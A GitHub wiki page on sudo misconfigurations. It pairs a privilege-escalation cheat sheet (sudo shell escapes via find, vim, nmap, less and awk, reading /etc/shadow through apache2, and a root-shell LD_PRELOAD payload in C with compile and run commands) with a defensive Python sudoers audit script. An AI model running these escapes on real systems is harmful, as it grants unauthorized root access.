Sudoers - CraigDonkin/Infrastructure GitHub Wiki

SUDO

Things to review:

  • What commands can a user run
  • Can you modify any of these binaries or files?
  • NOPASSWD
    • Don't need to know the password
  • LD_PRELOAD
  • What commands can be run

root ALL=(ALL) ALL

List Sudo Privileges

sudo -l

Command Privilege Escalation

##Find Command
sudo find /etc/passwd -exec /bin/sh \;
sudo find /bin -name nano -exec /bin/sh \;

##Vim
sudo vim -c '!sh'

##nmap
sudo nmap --interactive 
nmap> !sh

echo "os.execute('/bin/sh')" > /tmp/shell.nse &&

sudo nmap --script=/tmp/shell.nse

##man

sudo man man

!sh

##Less/More

sudo less /file

sudo more /file

!sh

##Awk

sudo awk 'BEGIN {system("/bin/sh")}'

##Apache

sudo apache2 -f /etc/shadow

LD_PRELOAD

Defaults env_keep += LD_PRELOAD

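#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>	/* setgid(), setuid() */

/* Runs when the dynamic loader loads this shared object. */
void _init() {
	unsetenv("LD_PRELOAD");	/* stop child processes from preloading it again */
	setgid(0);
	setuid(0);
	system("/bin/sh");
}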


To compile:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

To execute:

sudo LD_PRELOAD=/tmp/shell.so find
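
The review points above (NOPASSWD, a retained LD_PRELOAD, the binaries listed under Command Privilege Escalation, and modifiable command files) can be checked against a sudoers policy from the defender's side. The following audit script is an added example, not part of the original wiki; `audit_sudoers`, `world_writable` and the sample policy are constructed for illustration, and it assumes simple single-host entries with no alias expansion or escaped commas.

```python
import os
import re

# Binaries this page lists as giving a shell (or a file read) when run via sudo.
ESCAPE_BINARIES = {"find", "vim", "nmap", "man", "less", "more", "awk", "apache2"}

# Constructed sample policy, not taken from a real host.
SAMPLE_SUDOERS = """\
Defaults env_keep += LD_PRELOAD
root ALL=(ALL) ALL
alice ALL=(root) NOPASSWD: /usr/bin/find, \\
    /usr/bin/systemctl status nginx
bob ALL=(ALL) /usr/bin/less /var/log/syslog
"""

def world_writable(path):
    """True if path is absolute, exists, and any local user may modify it."""
    return os.path.isabs(path) and os.path.exists(path) and bool(
        os.stat(path).st_mode & 0o002)  # 0o002 is the other-write bit

def audit_sudoers(text):
    """Return (subject, command, issue) tuples for this page's review points."""
    findings = []
    for line in map(str.strip, text.replace("\\\n", " ").splitlines()):
        if line.startswith("Defaults"):
            if re.search(r"env_keep\s*\+?=.*\bLD_PRELOAD\b", line):
                findings.append(("Defaults", "-", "env_keep preserves LD_PRELOAD"))
            continue
        m = re.match(r"([^\s#]\S*)\s+[^\s=]+\s*=\s*(.+)", line)
        if not m or m.group(1).endswith("_Alias"):
            continue  # blanks, comments, includes, alias definitions
        who, spec = m.groups()
        nopasswd = False
        for part in re.split(r",(?![^(]*\))", spec):  # commas outside (runas)
            tags, cmd = re.match(
                r"(?:\([^)]*\)\s*)?((?:[A-Z_]+:\s*)*)(.*)", part.strip()).groups()
            if "PASSWD:" in tags:  # NOPASSWD:/PASSWD: carry over to later commands
                nopasswd = "NOPASSWD:" in tags
            path = cmd.split()[0] if cmd else ""
            if nopasswd:
                findings.append((who, cmd, "NOPASSWD: password not required"))
            if os.path.basename(path) in ESCAPE_BINARIES:
                findings.append((who, cmd, "binary can spawn a shell or read files"))
            if world_writable(path):
                findings.append((who, cmd, "command file is world-writable"))
    return findings

if __name__ == "__main__":
    print(*audit_sudoers(SAMPLE_SUDOERS), sep="\n")
```

On a real host, pass it the contents of /etc/sudoers and of each file under /etc/sudoers.d.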
